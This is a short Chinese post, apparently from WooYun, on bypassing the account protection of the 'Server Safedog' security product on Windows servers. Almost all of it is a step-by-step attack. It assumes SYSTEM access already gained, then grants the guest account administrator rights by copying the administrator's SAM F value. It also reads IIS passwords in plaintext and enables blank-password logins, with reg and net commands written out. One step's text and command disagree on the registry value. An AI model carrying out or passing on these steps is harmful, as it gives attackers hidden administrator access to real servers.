WooYun.org

服务器安全狗，在账户保护全开的状态下，是不可以添加用户的，但是并没有限制查看和修改密码的权限，这个是不容否认的，就算不允许修改密码，也可以读出iis用户密码明文，那么安全狗账户限制就如同虚设~

打狗棍法第一式

首先，用guest，演示一下，具体操作是通过注册表，篡改sam下用户的F值，使其达到管理权限.
首先，你必须有提权的exp,使自己达到system权限,大家都知道,administrator对应值是1F4,GUEST是1F5，如果有例外，下面会讲到。
下面是步骤:
1.使用net1 user guset 1 ,将guest密码重置为1，无需过问是否禁用
2.

reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" "x:\1.reg"

导出administrator的注册表值到某路径,修改内容，将"V"值删除，只留F值,将1F4修改为1F5,保存。
3.使用regedit /s x:/1.reg 导入注册表
就可以使用，guest 密码 1登陆了。

安全狗说:
在账户保护全开的情况下，如果不能更改密码呢？！

打狗棍法第二式

如果真的不能更改密码呢？则使用vbs查看iis用户密码，再使用

reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\names\用户名" "x:\2.reg"

查看其对应值，再重复以上第二步和第三步，使用查看到的明文密码登陆

安全狗又说：
如果不允许修改密码，iis用户是禁止登陆远程桌面的呢？

打狗棍法第三式

对啊，我们该怎么办？继续听我说，大家都知道guest是空密码，那我们就使用空密码登陆。
执行

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v limitblankpassworduse /t REG_DWORD /d 0 /f

修改limitblankpassworduse值为1，重复上面第二第三步骤，继续登陆。
oh ye~